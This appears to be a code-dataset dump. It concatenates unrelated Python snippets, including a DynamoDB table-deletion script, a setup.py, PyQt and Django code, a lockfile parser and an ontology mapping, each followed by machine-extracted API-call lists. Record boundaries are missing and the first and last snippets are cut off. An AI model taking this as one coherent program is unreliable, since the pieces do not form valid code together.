    """
    if " ".join([record['attr'],record['name']]).strip():
        Vessel(**record)
    else:
        dropped+=1
    """
Vessel.update()
# Vessels without a parent are re-parented to vessel 0.
for v in Vessel.universe:
    if v.parent is None:
        v.parent_id=0
Vessel.update()
print("Dropped {} Vessels".format(dropped))
dropped=0
print("Importing Forum...")
forum_url="https://raw.githubusercontent.com/XXIIVV/vessel.paradise/master/memory/forum.ma"
forum=str(urllib.request.urlopen(forum_url).read(),"utf-8")
for id_val,record in enumerate(tqdm(list(parse_memory_array(forum)),ascii=True)):
    record['from_id']=int(record['from'].lstrip("0") or "0")
    del record['from']
    record['host_id']=int(record['host'].lstrip("0") or "0")
    del record['host']
    record['timestamp_raw']=record['timestamp'].lstrip("0") or None
    del record['timestamp']
    if record['timestamp_raw']:
        record['timestamp_raw']=parse(record['timestamp_raw'])
    record['id']=id_val
    try:
        Forum(**record)
    except AssertionError:
        dropped+=1
Forum.update()
print("Dropped {} Messages".format(dropped))
"dateutil.parser.parse",
"vessel.Vessel.update",
"vessel.Vessel.metadata.drop_all",
"vessel.Forum.update",
"vessel.Vessel.metadata.create_all",
"vessel.Vessel",
"vessel.Forum",
"re.finditer"
] | [((2819, 2851), 'vessel.Vessel.metadata.drop_all', 'Vessel.metadata.drop_all', (['engine'], {}), '(engine)\n', (2843, 2851), False, 'from vessel import Vessel, Forum, InvalidVesselException, engine, session\n'), ((2852, 2886), 'vessel.Vessel.metadata.create_all', 'Vessel.metadata.create_all', (['engine'], {}), '(engine)\n', (2878, 2886), False, 'from vessel import Vessel, Forum, InvalidVesselException, engine, session\n'), ((4181, 4196), 'vessel.Vessel.update', 'Vessel.update', ([], {}), '()\n', (4194, 4196), False, 'from vessel import Vessel, Forum, InvalidVesselException, engine, session\n'), ((4270, 4285), 'vessel.Vessel.update', 'Vessel.update', ([], {}), '()\n', (4283, 4285), False, 'from vessel import Vessel, Forum, InvalidVesselException, engine, session\n'), ((5065, 5079), 'vessel.Forum.update', 'Forum.update', ([], {}), '()\n', (5077, 5079), False, 'from vessel import Vessel, Forum, InvalidVesselException, engine, session\n'), ((3487, 3515), 'dateutil.parser.parse', 'parse', (["record['created_raw']"], {}), "(record['created_raw'])\n", (3492, 3515), False, 'from dateutil.parser import parse\n'), ((4931, 4961), 'dateutil.parser.parse', 'parse', (["record['timestamp_raw']"], {}), "(record['timestamp_raw'])\n", (4936, 4961), False, 'from dateutil.parser import parse\n'), ((5003, 5018), 'vessel.Forum', 'Forum', ([], {}), '(**record)\n', (5008, 5018), False, 'from vessel import Vessel, Forum, InvalidVesselException, engine, session\n'), ((2055, 2086), 're.finditer', 're.finditer', (['"""(\\\\w+)\\\\s*"""', 'line'], {}), "('(\\\\w+)\\\\s*', line)\n", (2066, 2086), False, 'import re\n'), ((3958, 3974), 'vessel.Vessel', 'Vessel', ([], {}), '(**record)\n', (3964, 3974), False, 'from vessel import Vessel, Forum, InvalidVesselException, engine, session\n')] |
from __future__ import print_function # Python 2/3 compatibility
import boto3
# Point boto3 at a locally running DynamoDB endpoint on port 8000.
dynamodb = boto3.resource('dynamodb', endpoint_url="http://localhost:8000")
# Remove the Election and Vote tables.
table = dynamodb.Table('Election')
table.delete()
table = dynamodb.Table('Vote')
table.delete()
"boto3.resource"
] | [((90, 154), 'boto3.resource', 'boto3.resource', (['"""dynamodb"""'], {'endpoint_url': '"""http://localhost:8000"""'}), "('dynamodb', endpoint_url='http://localhost:8000')\n", (104, 154), False, 'import boto3\n')] |
import setuptools
# read the contents of your README file
from pathlib import Path
# Locate README.md next to this setup.py and use it as the long description.
this_directory = Path(__file__).parent
long_description = (this_directory / "README.md").read_text()
setuptools.setup(
    name='pybgpkit',
    version='0.1.0',
    description='BGPKIT tools Python bindings',
    url='https://github.com/bgpkit/pybgpkit',
    author='<NAME>',
    author_email='<EMAIL>',
    packages=setuptools.find_packages(),
    include_package_data=True,
    long_description=long_description,
    long_description_content_type='text/markdown',
    install_requires=[
        # available on pip
        'dataclasses_json',
        'pybgpkit-parser==0.1.0',
        'requests',
    ],
    entry_points={
        'console_scripts': [
            # expose the `pybgpkit` command backed by bgpkit.cli:main
            "pybgpkit=bgpkit.cli:main"
        ]
    }
)
| [
"setuptools.find_packages",
"pathlib.Path"
] | [((101, 115), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (105, 115), False, 'from pathlib import Path\n'), ((402, 428), 'setuptools.find_packages', 'setuptools.find_packages', ([], {}), '()\n', (426, 428), False, 'import setuptools\n')] |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui/chain_creation.ui'
#
# Created by: PyQt5 UI code generator 5.9
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
    """pyuic5-generated scaffold for the chain-creation dialog (do not edit by hand)."""
    def setupUi(self, Dialog):
        """Create and position the dialog's widgets: a text edit, a combo box and OK/Cancel buttons."""
        Dialog.setObjectName("Dialog")
        Dialog.resize(215, 116)
        self.textEdit_2 = QtWidgets.QTextEdit(Dialog)
        self.textEdit_2.setGeometry(QtCore.QRect(120, 20, 71, 31))
        self.textEdit_2.setObjectName("textEdit_2")
        self.comboBox = QtWidgets.QComboBox(Dialog)
        self.comboBox.setGeometry(QtCore.QRect(30, 20, 78, 27))
        self.comboBox.setObjectName("comboBox")
        self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
        self.buttonBox.setGeometry(QtCore.QRect(30, 70, 176, 27))
        self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
        self.buttonBox.setObjectName("buttonBox")
        self.retranslateUi(Dialog)
        QtCore.QMetaObject.connectSlotsByName(Dialog)
    def retranslateUi(self, Dialog):
        """Set user-visible strings (kept separate for Qt retranslation support)."""
        _translate = QtCore.QCoreApplication.translate
        Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
| [
"PyQt5.QtWidgets.QTextEdit",
"PyQt5.QtWidgets.QDialogButtonBox",
"PyQt5.QtWidgets.QComboBox",
"PyQt5.QtCore.QMetaObject.connectSlotsByName",
"PyQt5.QtCore.QRect"
] | [((400, 427), 'PyQt5.QtWidgets.QTextEdit', 'QtWidgets.QTextEdit', (['Dialog'], {}), '(Dialog)\n', (419, 427), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((571, 598), 'PyQt5.QtWidgets.QComboBox', 'QtWidgets.QComboBox', (['Dialog'], {}), '(Dialog)\n', (590, 598), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((736, 770), 'PyQt5.QtWidgets.QDialogButtonBox', 'QtWidgets.QDialogButtonBox', (['Dialog'], {}), '(Dialog)\n', (762, 770), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1038, 1083), 'PyQt5.QtCore.QMetaObject.connectSlotsByName', 'QtCore.QMetaObject.connectSlotsByName', (['Dialog'], {}), '(Dialog)\n', (1075, 1083), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((464, 493), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(120)', '(20)', '(71)', '(31)'], {}), '(120, 20, 71, 31)\n', (476, 493), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((633, 661), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(30)', '(20)', '(78)', '(27)'], {}), '(30, 20, 78, 27)\n', (645, 661), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((806, 835), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(30)', '(70)', '(176)', '(27)'], {}), '(30, 70, 176, 27)\n', (818, 835), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n')] |
from sklearn.base import BaseEstimator
from sklearn.multiclass import OneVsRestClassifier
from sklearn.linear_model import LogisticRegression as SKLearnLR
class LogisticRegression(BaseEstimator):
def __init__(self):
pass
def fit(self, X, y):
# TODO: Consider pure (no penalty) LR
# TODO: Look into convergence issues with other (faster) solvers
# (Also running into some version-related issues.)
self._clf = OneVsRestClassifier(SKLearnLR(solver='liblinear'))
self._clf.fit(X, y)
return self
def predict(self, X):
return self._clf.predict(X) | [
"sklearn.linear_model.LogisticRegression"
] | [((484, 513), 'sklearn.linear_model.LogisticRegression', 'SKLearnLR', ([], {'solver': '"""liblinear"""'}), "(solver='liblinear')\n", (493, 513), True, 'from sklearn.linear_model import LogisticRegression as SKLearnLR\n')] |
import numpy as np
MAX = 10000
matrix = np.full((MAX, MAX), False)
def pretty_print(matrix):
print_matrix = np.full(matrix.shape, ".")
print_matrix[matrix] = "#"
for row in print_matrix:
for symb in row:
print(symb, end="")
print()
def fold_once(matrix, axis, value):
if axis == "y": # top fold
matrix = matrix.T
assert matrix[:, value].sum() == 0
iter = matrix.shape[1] - value
for i in range(iter):
matrix[:, value-i] = np.logical_or(matrix[:, value-i], matrix[:, value+i])
matrix = matrix[:, :value]
return matrix if axis == "x" else matrix.T
max_x, max_y = float("-inf"), float("-inf")
while inp := input(): # walrus
y, x = [int(num) for num in inp.split(",")]
matrix[x, y] = True
max_x = max(x, max_x)
max_y = max(y, max_y)
if max_x % 2 != 0:
max_x += 1
if max_y % 2 != 0:
max_y += 1
first = False
matrix = matrix[:max_x+1, :max_y+1]
while inp := input():
axis, value = inp.split(" ")[-1].split("=")
value = int(value)
matrix = fold_once(matrix, axis, value)
if not first:
print("Part 1:", matrix.sum())
first = True
print()
print("PART 2")
print("======")
pretty_print(matrix)
| [
"numpy.full",
"numpy.logical_or"
] | [((41, 67), 'numpy.full', 'np.full', (['(MAX, MAX)', '(False)'], {}), '((MAX, MAX), False)\n', (48, 67), True, 'import numpy as np\n'), ((115, 141), 'numpy.full', 'np.full', (['matrix.shape', '"""."""'], {}), "(matrix.shape, '.')\n", (122, 141), True, 'import numpy as np\n'), ((502, 559), 'numpy.logical_or', 'np.logical_or', (['matrix[:, value - i]', 'matrix[:, value + i]'], {}), '(matrix[:, value - i], matrix[:, value + i])\n', (515, 559), True, 'import numpy as np\n')] |
from ckeditor.fields import RichTextField
from django.conf import settings
from django.db import models
from django.urls import reverse
from django.utils import timezone
from django.utils.html import strip_tags
from django.utils.text import Truncator
from django.utils.translation import gettext_lazy as _
from html_sanitizer.django import get_sanitizer
class BaseQuerySet(models.QuerySet):
def visible(self):
return self.exclude(moderation_status=self.model.HIDDEN)
class BaseModel(models.Model):
GOOD = "good"
FLAGGED = "flagged"
HIDDEN = "hidden"
MODERATION_STATUS_CHOICES = (
(GOOD, _("good")),
(FLAGGED, _("flagged")),
(HIDDEN, _("hidden")),
)
MODERATION_ACTION_CHOICES = (
(GOOD, _("approve content")),
(HIDDEN, _("hide content")),
)
created_at = models.DateTimeField(_("created at"), default=timezone.now)
authored_by = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
verbose_name=_("authored by"),
)
moderation_status = models.CharField(
_("moderation status"),
max_length=10,
choices=MODERATION_STATUS_CHOICES,
default=GOOD,
)
objects = BaseQuerySet.as_manager()
class Meta:
abstract = True
class ThreadQuerySet(BaseQuerySet):
def active(self):
return self.visible().filter(closed_at__isnull=True)
def closed(self):
return self.visible().filter(closed_at__isnull=False)
class Thread(BaseModel):
title = models.CharField(_("title"), max_length=200)
is_pinned = models.BooleanField(
_("is pinned"),
default=False,
help_text=_("Pinned threads are shown at the top of the thread list."),
)
closed_at = models.DateTimeField(_("closed at"), blank=True, null=True)
latest_post = models.OneToOneField(
"Post",
on_delete=models.SET_NULL,
related_name="+",
blank=True,
null=True,
verbose_name=_("latest post"),
)
post_count = models.IntegerField(_("post count"), default=0)
starred_by = models.ManyToManyField(
settings.AUTH_USER_MODEL,
blank=True,
related_name="starred_threads",
verbose_name=_("starred by"),
)
objects = ThreadQuerySet.as_manager()
class Meta:
ordering = ["-is_pinned", "-latest_post__created_at", "-created_at"]
verbose_name = _("thread")
verbose_name_plural = _("threads")
def __str__(self):
return self.title
def get_absolute_url(self):
if self.moderation_status == self.HIDDEN:
return reverse("tinyforum:thread-list")
return reverse("tinyforum:thread-detail", kwargs={"pk": self.pk})
def save(self, *args, **kwargs):
if self.pk:
self.post_count = self.posts.visible().count()
self.latest_post = self.posts.visible().last()
super().save(*args, **kwargs)
save.alters_data = True
class Post(BaseModel):
thread = models.ForeignKey(
Thread, on_delete=models.CASCADE, verbose_name=_("thread"), related_name="posts"
)
text = RichTextField(_("text"), config_name="tinyforum-post")
class Meta:
ordering = ["created_at"]
verbose_name = _("post")
verbose_name_plural = _("post")
def __str__(self):
return Truncator(strip_tags(self.text)).words(20, truncate="...")
def save(self, *args, **kwargs):
self.text = get_sanitizer("tinyforum-post").sanitize(self.text)
super().save(*args, **kwargs)
self.thread.save()
save.alters_data = True
class Report(BaseModel):
REASON_CHOICES = (
("annoying", _("It's annoying or not interesting")),
("misplaced", _("I think it shouldn't be here")),
("spam", _("It's spam")),
)
reason = models.CharField(_("reason"), max_length=10, choices=REASON_CHOICES)
notes = models.TextField(
_("notes"), blank=True, help_text=_("Anything else you want to say?")
)
handled_at = models.DateTimeField(_("handled at"), blank=True, null=True)
handled_by = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.PROTECT,
blank=True,
null=True,
verbose_name=_("handled by"),
related_name="+",
)
# Override BaseModel.moderation_status with a blank=True version
moderation_status = models.CharField(
_("moderation status"),
max_length=10,
choices=BaseModel.MODERATION_STATUS_CHOICES,
default=BaseModel.FLAGGED,
)
class Meta:
abstract = True
class PostReport(Report):
post = models.ForeignKey(
Post, on_delete=models.CASCADE, related_name="reports", verbose_name=_("post")
)
class Meta:
unique_together = (("authored_by", "post"),)
verbose_name = _("post report")
verbose_name_plural = _("post reports")
| [
"django.utils.translation.gettext_lazy",
"django.utils.html.strip_tags",
"html_sanitizer.django.get_sanitizer",
"django.urls.reverse"
] | [((864, 879), 'django.utils.translation.gettext_lazy', '_', (['"""created at"""'], {}), "('created at')\n", (865, 879), True, 'from django.utils.translation import gettext_lazy as _\n'), ((1103, 1125), 'django.utils.translation.gettext_lazy', '_', (['"""moderation status"""'], {}), "('moderation status')\n", (1104, 1125), True, 'from django.utils.translation import gettext_lazy as _\n'), ((1565, 1575), 'django.utils.translation.gettext_lazy', '_', (['"""title"""'], {}), "('title')\n", (1566, 1575), True, 'from django.utils.translation import gettext_lazy as _\n'), ((1638, 1652), 'django.utils.translation.gettext_lazy', '_', (['"""is pinned"""'], {}), "('is pinned')\n", (1639, 1652), True, 'from django.utils.translation import gettext_lazy as _\n'), ((1800, 1814), 'django.utils.translation.gettext_lazy', '_', (['"""closed at"""'], {}), "('closed at')\n", (1801, 1814), True, 'from django.utils.translation import gettext_lazy as _\n'), ((2078, 2093), 'django.utils.translation.gettext_lazy', '_', (['"""post count"""'], {}), "('post count')\n", (2079, 2093), True, 'from django.utils.translation import gettext_lazy as _\n'), ((2445, 2456), 'django.utils.translation.gettext_lazy', '_', (['"""thread"""'], {}), "('thread')\n", (2446, 2456), True, 'from django.utils.translation import gettext_lazy as _\n'), ((2487, 2499), 'django.utils.translation.gettext_lazy', '_', (['"""threads"""'], {}), "('threads')\n", (2488, 2499), True, 'from django.utils.translation import gettext_lazy as _\n'), ((2700, 2758), 'django.urls.reverse', 'reverse', (['"""tinyforum:thread-detail"""'], {'kwargs': "{'pk': self.pk}"}), "('tinyforum:thread-detail', kwargs={'pk': self.pk})\n", (2707, 2758), False, 'from django.urls import reverse\n'), ((3179, 3188), 'django.utils.translation.gettext_lazy', '_', (['"""text"""'], {}), "('text')\n", (3180, 3188), True, 'from django.utils.translation import gettext_lazy as _\n'), ((3294, 3303), 'django.utils.translation.gettext_lazy', '_', (['"""post"""'], 
{}), "('post')\n", (3295, 3303), True, 'from django.utils.translation import gettext_lazy as _\n'), ((3334, 3343), 'django.utils.translation.gettext_lazy', '_', (['"""post"""'], {}), "('post')\n", (3335, 3343), True, 'from django.utils.translation import gettext_lazy as _\n'), ((3886, 3897), 'django.utils.translation.gettext_lazy', '_', (['"""reason"""'], {}), "('reason')\n", (3887, 3897), True, 'from django.utils.translation import gettext_lazy as _\n'), ((3976, 3986), 'django.utils.translation.gettext_lazy', '_', (['"""notes"""'], {}), "('notes')\n", (3977, 3986), True, 'from django.utils.translation import gettext_lazy as _\n'), ((4091, 4106), 'django.utils.translation.gettext_lazy', '_', (['"""handled at"""'], {}), "('handled at')\n", (4092, 4106), True, 'from django.utils.translation import gettext_lazy as _\n'), ((4464, 4486), 'django.utils.translation.gettext_lazy', '_', (['"""moderation status"""'], {}), "('moderation status')\n", (4465, 4486), True, 'from django.utils.translation import gettext_lazy as _\n'), ((4890, 4906), 'django.utils.translation.gettext_lazy', '_', (['"""post report"""'], {}), "('post report')\n", (4891, 4906), True, 'from django.utils.translation import gettext_lazy as _\n'), ((4937, 4954), 'django.utils.translation.gettext_lazy', '_', (['"""post reports"""'], {}), "('post reports')\n", (4938, 4954), True, 'from django.utils.translation import gettext_lazy as _\n'), ((628, 637), 'django.utils.translation.gettext_lazy', '_', (['"""good"""'], {}), "('good')\n", (629, 637), True, 'from django.utils.translation import gettext_lazy as _\n'), ((658, 670), 'django.utils.translation.gettext_lazy', '_', (['"""flagged"""'], {}), "('flagged')\n", (659, 670), True, 'from django.utils.translation import gettext_lazy as _\n'), ((690, 701), 'django.utils.translation.gettext_lazy', '_', (['"""hidden"""'], {}), "('hidden')\n", (691, 701), True, 'from django.utils.translation import gettext_lazy as _\n'), ((759, 779), 
'django.utils.translation.gettext_lazy', '_', (['"""approve content"""'], {}), "('approve content')\n", (760, 779), True, 'from django.utils.translation import gettext_lazy as _\n'), ((799, 816), 'django.utils.translation.gettext_lazy', '_', (['"""hide content"""'], {}), "('hide content')\n", (800, 816), True, 'from django.utils.translation import gettext_lazy as _\n'), ((1029, 1045), 'django.utils.translation.gettext_lazy', '_', (['"""authored by"""'], {}), "('authored by')\n", (1030, 1045), True, 'from django.utils.translation import gettext_lazy as _\n'), ((1695, 1755), 'django.utils.translation.gettext_lazy', '_', (['"""Pinned threads are shown at the top of the thread list."""'], {}), "('Pinned threads are shown at the top of the thread list.')\n", (1696, 1755), True, 'from django.utils.translation import gettext_lazy as _\n'), ((2017, 2033), 'django.utils.translation.gettext_lazy', '_', (['"""latest post"""'], {}), "('latest post')\n", (2018, 2033), True, 'from django.utils.translation import gettext_lazy as _\n'), ((2262, 2277), 'django.utils.translation.gettext_lazy', '_', (['"""starred by"""'], {}), "('starred by')\n", (2263, 2277), True, 'from django.utils.translation import gettext_lazy as _\n'), ((2652, 2684), 'django.urls.reverse', 'reverse', (['"""tinyforum:thread-list"""'], {}), "('tinyforum:thread-list')\n", (2659, 2684), False, 'from django.urls import reverse\n'), ((3114, 3125), 'django.utils.translation.gettext_lazy', '_', (['"""thread"""'], {}), "('thread')\n", (3115, 3125), True, 'from django.utils.translation import gettext_lazy as _\n'), ((3717, 3754), 'django.utils.translation.gettext_lazy', '_', (['"""It\'s annoying or not interesting"""'], {}), '("It\'s annoying or not interesting")\n', (3718, 3754), True, 'from django.utils.translation import gettext_lazy as _\n'), ((3779, 3812), 'django.utils.translation.gettext_lazy', '_', (['"""I think it shouldn\'t be here"""'], {}), '("I think it shouldn\'t be here")\n', (3780, 3812), True, 'from 
django.utils.translation import gettext_lazy as _\n'), ((3832, 3846), 'django.utils.translation.gettext_lazy', '_', (['"""It\'s spam"""'], {}), '("It\'s spam")\n', (3833, 3846), True, 'from django.utils.translation import gettext_lazy as _\n'), ((4010, 4045), 'django.utils.translation.gettext_lazy', '_', (['"""Anything else you want to say?"""'], {}), "('Anything else you want to say?')\n", (4011, 4045), True, 'from django.utils.translation import gettext_lazy as _\n'), ((4295, 4310), 'django.utils.translation.gettext_lazy', '_', (['"""handled by"""'], {}), "('handled by')\n", (4296, 4310), True, 'from django.utils.translation import gettext_lazy as _\n'), ((4781, 4790), 'django.utils.translation.gettext_lazy', '_', (['"""post"""'], {}), "('post')\n", (4782, 4790), True, 'from django.utils.translation import gettext_lazy as _\n'), ((3500, 3531), 'html_sanitizer.django.get_sanitizer', 'get_sanitizer', (['"""tinyforum-post"""'], {}), "('tinyforum-post')\n", (3513, 3531), False, 'from html_sanitizer.django import get_sanitizer\n'), ((3393, 3414), 'django.utils.html.strip_tags', 'strip_tags', (['self.text'], {}), '(self.text)\n', (3403, 3414), False, 'from django.utils.html import strip_tags\n')] |
from django.urls import path
from account import views as account_views
urlpatterns = [
path('begin/', account_views.BeginView.as_view(), name='begin'),
path('signup/', account_views.SignUpView.as_view(), name='signup'),
path('login/', account_views.LoginView.as_view(), name='login'),
path('logout/', account_views.LogoutView.as_view(), name='logout'),
path('password-reset/', account_views.ResetPasswordView.as_view(), name='password-reset'),
path('password-reset-sent/', account_views.password_reset_sent, name='password-reset-sent'),
path('account-activation-send/', account_views.account_activation_sent, name='account-activation-sent'),
path('activate/<uidb64>/<token>/', account_views.activate, name='activate'),
]
| [
"account.views.BeginView.as_view",
"account.views.LogoutView.as_view",
"account.views.LoginView.as_view",
"account.views.SignUpView.as_view",
"django.urls.path",
"account.views.ResetPasswordView.as_view"
] | [((471, 567), 'django.urls.path', 'path', (['"""password-reset-sent/"""', 'account_views.password_reset_sent'], {'name': '"""password-reset-sent"""'}), "('password-reset-sent/', account_views.password_reset_sent, name=\n 'password-reset-sent')\n", (475, 567), False, 'from django.urls import path\n'), ((569, 676), 'django.urls.path', 'path', (['"""account-activation-send/"""', 'account_views.account_activation_sent'], {'name': '"""account-activation-sent"""'}), "('account-activation-send/', account_views.account_activation_sent,\n name='account-activation-sent')\n", (573, 676), False, 'from django.urls import path\n'), ((678, 753), 'django.urls.path', 'path', (['"""activate/<uidb64>/<token>/"""', 'account_views.activate'], {'name': '"""activate"""'}), "('activate/<uidb64>/<token>/', account_views.activate, name='activate')\n", (682, 753), False, 'from django.urls import path\n'), ((108, 141), 'account.views.BeginView.as_view', 'account_views.BeginView.as_view', ([], {}), '()\n', (139, 141), True, 'from account import views as account_views\n'), ((179, 213), 'account.views.SignUpView.as_view', 'account_views.SignUpView.as_view', ([], {}), '()\n', (211, 213), True, 'from account import views as account_views\n'), ((250, 283), 'account.views.LoginView.as_view', 'account_views.LoginView.as_view', ([], {}), '()\n', (281, 283), True, 'from account import views as account_views\n'), ((320, 354), 'account.views.LogoutView.as_view', 'account_views.LogoutView.as_view', ([], {}), '()\n', (352, 354), True, 'from account import views as account_views\n'), ((400, 441), 'account.views.ResetPasswordView.as_view', 'account_views.ResetPasswordView.as_view', ([], {}), '()\n', (439, 441), True, 'from account import views as account_views\n')] |
"""MEG system lockfile parser
Can be used to parse the lock file and preform operations on the lockfile
Only interacts with the lockfile, does not preform any git actions
Does not check permissions before actions are taken
All file paths are relitive to the repository directory
Working directory should be changed by the git module
"""
import json
import os.path
import time
class LockFile:
"""Parse a lockfile and preform locking operations
"""
def __init__(self, filepath):
"""Open a lockfile and initalize class with it
Args:
filepath (string): path to the lockfile
"""
self.update(filepath)
def addLock(self, filepath, username):
"""Adds the lock to the lockfile
Args:
filepath (string): path to the file to lock
username (string): name of locking user
"""
self._lockData["locks"].append({
"file": filepath,
"user": username,
"date": time.time()
})
json.dump(self._lockData, open(self._filepath, 'w'))
def removeLock(self, filepath):
"""Remove any lock for the given file
Args:
filepath (string): path to the file to unlock
"""
for entry in self._lockData["locks"]:
if(entry["file"] == filepath):
self._lockData["locks"].remove(entry)
json.dump(self._lockData, open(self._filepath, 'w'))
def findLock(self, filepath):
"""Find if there is a lock on the file
Args:
filepath (string): path of file to look for
Returns:
(dictionary): lockfile entry for the file
(None): There is no entry
"""
for entry in self._lockData["locks"]:
if(entry["file"] == filepath):
return entry
return None
@property
def locks(self):
"""Returns the list of locks
"""
return self._lockData["locks"]
def update(self, filepath=None):
"""Updates this object with the current data in the lockfile
If the file doesn't exist, create one
Args:
filepath (string): path to the lockfile
"""
if(filepath is None):
filepath = self._filepath
else:
self._filepath = filepath
if(not os.path.exists(filepath)):
self._locks = {
"comment": "MEG System locking file, avoid manually editing",
"locks": []
}
newFile = open(filepath, 'w')
newFile.write(json.dumps(self._locks))
newFile.close()
try:
self._lockData = json.load(open(filepath))
except json.decoder.JSONDecodeError:
#Lock file couldn't be found, or is corrupted
#TODO: do something here
pass
| [
"json.dumps",
"time.time"
] | [((997, 1008), 'time.time', 'time.time', ([], {}), '()\n', (1006, 1008), False, 'import time\n'), ((2626, 2649), 'json.dumps', 'json.dumps', (['self._locks'], {}), '(self._locks)\n', (2636, 2649), False, 'import json\n')] |
# Generated by Django 3.1.3 on 2020-12-08 11:34
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('artist', '0006_auto_20201208_1052'),
]
operations = [
migrations.AlterModelOptions(
name='comment',
options={},
),
migrations.RemoveField(
model_name='comment',
name='name',
),
migrations.AddField(
model_name='comment',
name='slug',
field=models.SlugField(default=1),
preserve_default=False,
),
migrations.AlterField(
model_name='comment',
name='content',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='artist.content'),
),
]
| [
"django.db.migrations.AlterModelOptions",
"django.db.models.ForeignKey",
"django.db.migrations.RemoveField",
"django.db.models.SlugField"
] | [((267, 323), 'django.db.migrations.AlterModelOptions', 'migrations.AlterModelOptions', ([], {'name': '"""comment"""', 'options': '{}'}), "(name='comment', options={})\n", (295, 323), False, 'from django.db import migrations, models\n'), ((368, 425), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""comment"""', 'name': '"""name"""'}), "(model_name='comment', name='name')\n", (390, 425), False, 'from django.db import migrations, models\n'), ((568, 595), 'django.db.models.SlugField', 'models.SlugField', ([], {'default': '(1)'}), '(default=1)\n', (584, 595), False, 'from django.db import migrations, models\n'), ((755, 843), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""artist.content"""'}), "(on_delete=django.db.models.deletion.CASCADE, to=\n 'artist.content')\n", (772, 843), False, 'from django.db import migrations, models\n')] |
from pathlib import Path
from ontopy import get_ontology, World
# Setup dlite paths
thisdir = Path(__file__).parent.absolute()
rootdir = thisdir.parent.parent
# Note install emmopython from github, not pypi.
world = World()
mapsTo_onto = world.get_ontology(f'{rootdir}/ontology/mapsTo.ttl').load(
EMMObased=False)
chemistry_onto = world.get_ontology(f'{rootdir}/ontology/chemistry.ttl').load()
dlite_onto = world.get_ontology(
'https://raw.githubusercontent.com/emmo-repo/datamodel-ontology/master'
'/dlitemodel.ttl').load(EMMObased=False)
mapping = world.get_ontology('http://onto-ns.com/ontology/mapping#')
mapping.set_version('0.1')
mapping.imported_ontologies.extend([mapsTo_onto, chemistry_onto, dlite_onto])
substance_model = dlite_onto.Metadata()
substance_model.iri = 'http://onto-ns.com/meta/0.1/Substance'
substance_energy = dlite_onto.Metadata()
substance_energy.iri = 'http://onto-ns.com/meta/0.1/Substance#molecule_energy'
substance_id = dlite_onto.Metadata()
substance_id.iri = 'http://onto-ns.com/meta/0.1/Substance#id'
with mapping:
substance_model.mapsTo.append(chemistry_onto.MoleculeModel)
substance_energy.mapsTo.append(chemistry_onto.GroundStateEnergy)
substance_id.mapsTo.append(chemistry_onto.Identifier)
mapping.save(f'{thisdir}/mapping_substance.ttl')
# A catalog file is not writte here because the catalog from molecule
# can be reused. This will most likely not be the case in a more realistic
# example where the different mappings will reside in different places
# (folders)
| [
"ontopy.World",
"pathlib.Path"
] | [((220, 227), 'ontopy.World', 'World', ([], {}), '()\n', (225, 227), False, 'from ontopy import get_ontology, World\n'), ((97, 111), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (101, 111), False, 'from pathlib import Path\n')] |
from distutils.version import StrictVersion
import logging
def __get_version(version):
if 'dev' in str(version):
version = version[:version.find('.dev')]
return StrictVersion(version)
# Detect pandas and use a mock if missing
PANDAS_MIN_VERSION = '0.13.0'
try:
import pandas
if __get_version(pandas.__version__) < StrictVersion(PANDAS_MIN_VERSION):
HAS_PANDAS = False
logging.warn('Pandas version {} is not supported. Minimum required version: {}. '
'Pandas support will be disabled.'.format(pandas.__version__, PANDAS_MIN_VERSION))
else:
HAS_PANDAS = True
except:
HAS_PANDAS = False
import pandas_mock as pandas
# Detect matplotlib and use a mock if missing
try:
import matplotlib.pyplot
HAS_MATPLOTLIB = True
except:
HAS_MATPLOTLIB = False
import matplotlib_mock as matplotlib
# Detect numpy and use a mock if missing
NUMPY_MIN_VERSION = '1.4'
try:
import numpy
if __get_version(numpy.__version__) < StrictVersion(NUMPY_MIN_VERSION):
HAS_NUMPY = False
logging.warn('Numpy version {} is not supported. Minimum required version: {}. '
'Numpy support will be disabled.'.format(numpy.__version__, NUMPY_MIN_VERSION))
else:
HAS_NUMPY = True
except:
HAS_NUMPY = False
import numpy_mock as numpy
# Detect matplotlib and use a mock if missing
try:
import py4j
HAS_PY4J = True
except:
HAS_PY4J = False
import py4j_mock as py4j
| [
"distutils.version.StrictVersion"
] | [((180, 202), 'distutils.version.StrictVersion', 'StrictVersion', (['version'], {}), '(version)\n', (193, 202), False, 'from distutils.version import StrictVersion\n'), ((343, 376), 'distutils.version.StrictVersion', 'StrictVersion', (['PANDAS_MIN_VERSION'], {}), '(PANDAS_MIN_VERSION)\n', (356, 376), False, 'from distutils.version import StrictVersion\n'), ((1018, 1050), 'distutils.version.StrictVersion', 'StrictVersion', (['NUMPY_MIN_VERSION'], {}), '(NUMPY_MIN_VERSION)\n', (1031, 1050), False, 'from distutils.version import StrictVersion\n')] |
from pyspark import SparkConf, SparkContext
from pyspark import SQLContext
from pyspark.sql.functions import udf
import string
conf = SparkConf().setAppName('MovieRating')
sc = SparkContext(conf = conf)
sqlContext = SQLContext(sc)
